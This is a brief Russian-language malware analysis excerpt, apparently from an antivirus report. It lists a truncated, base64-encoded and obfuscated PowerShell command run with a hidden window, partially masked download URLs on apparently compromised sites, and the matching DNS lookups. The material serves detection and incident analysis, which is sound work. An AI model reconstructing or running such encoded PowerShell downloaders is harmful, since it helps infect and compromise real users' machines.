Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVADUAagA3AF8AYQA0AD0AKAAnAE0AJwArACgAJwBsACcAKwAnAGcAZgB5AGcAJwArACcAdAAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVABFAE0AUABcAFcAbwBSAEQAXAAyADAAMQA5AFwAIAAtAG...
- http://nu####demir.com.tr/n/
- http://www.jh#####ganiccotton.com/cgi-bin/qqeO0VU/
- http://wi###onsul.com/recruit/A7x/
- http://www.ce###.com.br/cgi-bin/QaxzC/
- http://ce###.com.br/cgi-bin/QaxzC/
- http://pr#####oneescrow.com/PreOneMap/K/
- DNS ASK nu####demir.com.tr
- DNS ASK jh#####ganiccotton.com
- DNS ASK wi###onsul.com
- DNS ASK ce###.com.br
- DNS ASK oz##ot.com
- DNS ASK xe###tportal.nl
- DNS ASK pr#####oneescrow.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVADUAagA3AF8AYQA0AD0AKAAnAE0AJwArACgAJwBsACcAKwAnAGcAZgB5AGcAJwArACcAdAAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVABFAE0AUABcAFcAbwBSAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)